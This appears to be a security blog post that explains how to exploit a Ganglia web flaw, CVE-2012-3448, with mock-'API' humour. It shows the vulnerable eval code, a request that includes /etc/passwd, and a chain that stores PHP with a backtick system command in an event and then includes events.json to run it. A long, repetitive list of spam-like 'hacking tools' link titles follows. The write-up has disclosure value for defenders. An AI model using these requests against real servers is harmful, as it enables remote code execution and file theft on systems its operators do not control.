Monday, August 24, 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Related posts


  1. Pentest Tools Website Vulnerability
  2. Hacking Tools Name
  3. Usb Pentest Tools
  4. New Hack Tools
  5. Hacking Tools Free Download
  6. Ethical Hacker Tools
  7. Hacking Tools 2019
  8. Pentest Tools Port Scanner
  9. Hack Tool Apk
  10. Pentest Tools Online
  11. Hack Tools
  12. Pentest Tools
  13. Pentest Tools Linux
  14. Pentest Automation Tools
  15. Hacker
  16. Hackers Toolbox
  17. Hack And Tools
  18. Pentest Tools Apk
  19. Android Hack Tools Github
  20. Pentest Tools Website Vulnerability
  21. Hack Apps
  22. Pentest Tools For Ubuntu
  23. Pentest Box Tools Download
  24. Hack Tool Apk No Root
  25. Hacking Tools For Pc
  26. Hack Tools
  27. Pentest Tools Bluekeep
  28. Hacking Tools For Games
  29. Hack And Tools
  30. Hacker Tools Linux
  31. Pentest Tools Free
  32. Bluetooth Hacking Tools Kali
  33. Hack Website Online Tool
  34. Pentest Tools
  35. Hacker Tools Software
  36. Hack Tools For Mac
  37. Pentest Tools Open Source
  38. Computer Hacker
  39. Pentest Tools Find Subdomains
  40. Pentest Tools Website
  41. Hacker Tools Apk Download
  42. How To Make Hacking Tools
  43. Hacking Tools Hardware
  44. Hacking Tools Kit
  45. Pentest Tools Find Subdomains
  46. Hacker Tools Apk Download
  47. Hack Rom Tools
  48. How To Install Pentest Tools In Ubuntu
  49. Hacker Tools Github
  50. Install Pentest Tools Ubuntu
  51. Easy Hack Tools
  52. Pentest Tools
  53. How To Make Hacking Tools
  54. Hacker Tools Apk Download
  55. Hacker Tools Mac
  56. Easy Hack Tools
  57. Pentest Tools Website
  58. Free Pentest Tools For Windows
  59. Hacker Tools List
  60. Pentest Tools Online
  61. Beginner Hacker Tools
  62. Pentest Tools Bluekeep
  63. Hack Tools Mac
  64. Best Pentesting Tools 2018
  65. Hacker Tools Online
  66. Pentest Tools For Ubuntu
  67. Nsa Hacker Tools
  68. What Is Hacking Tools
  69. Hack Tools For Pc
  70. Pentest Tools Linux
  71. New Hack Tools
  72. Hacking Tools For Beginners
  73. Hacker
  74. Hacking Tools 2019
  75. Hack Tools
  76. Hacker Tools Apk
  77. Hacker Tools Free
  78. Ethical Hacker Tools
  79. Hacker Tools For Pc
  80. Pentest Tools Website Vulnerability
  81. Hacker Tools List
  82. Ethical Hacker Tools
  83. Hacker Tools Github
  84. Hacking Tools For Pc
  85. Android Hack Tools Github
  86. Top Pentest Tools
  87. What Is Hacking Tools
  88. Hacks And Tools
  89. Pentest Tools Tcp Port Scanner
  90. Hack Tools Download
  91. Pentest Tools Github
  92. Pentest Tools Website
  93. Game Hacking
  94. Hacking Tools For Beginners
  95. Pentest Recon Tools
  96. Tools For Hacker
  97. Android Hack Tools Github
  98. Hacking Tools Free Download
  99. Nsa Hack Tools
  100. Hack Tools Download
  101. Underground Hacker Sites
  102. Hack App
  103. Usb Pentest Tools
  104. Growth Hacker Tools
  105. Beginner Hacker Tools
  106. Hack Tools
  107. Hacker Techniques Tools And Incident Handling
  108. Hacking Tools Download
  109. Hacking Tools Windows 10
  110. Hack Tools 2019
  111. Hacking Tools For Games
  112. Tools 4 Hack
  113. Pentest Tools Website
  114. Bluetooth Hacking Tools Kali
  115. Hacker Tools Free
  116. Hack Tool Apk No Root
  117. Hacking Tools And Software
  118. Hacker Tools For Mac
  119. Hacking Tools Kit
  120. Hacker Search Tools
  121. New Hack Tools
  122. Kik Hack Tools
  123. Hacking App
  124. Pentest Tools For Windows
  125. Pentest Tools Free
  126. Hack Tools Online
  127. Pentest Tools Nmap
  128. Growth Hacker Tools
  129. Pentest Tools Online
  130. Hacks And Tools
  131. Hack Tools For Games
  132. Pentest Tools For Ubuntu
  133. Underground Hacker Sites
  134. Hacker Tools For Mac
  135. Hacker Tools Apk Download
  136. Pentest Tools Subdomain
  137. Pentest Tools For Android
  138. Hacking Tools Github
  139. Pentest Tools Apk
  140. Pentest Tools Subdomain
  141. Pentest Tools Bluekeep
  142. Beginner Hacker Tools
  143. Pentest Tools
  144. Best Hacking Tools 2020
  145. Pentest Tools Linux
  146. Hack And Tools
  147. Hacker Tools For Pc
  148. Hacking Tools Pc
  149. Hacker Tools Software
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Classic Lishi Tools page:1

Loading...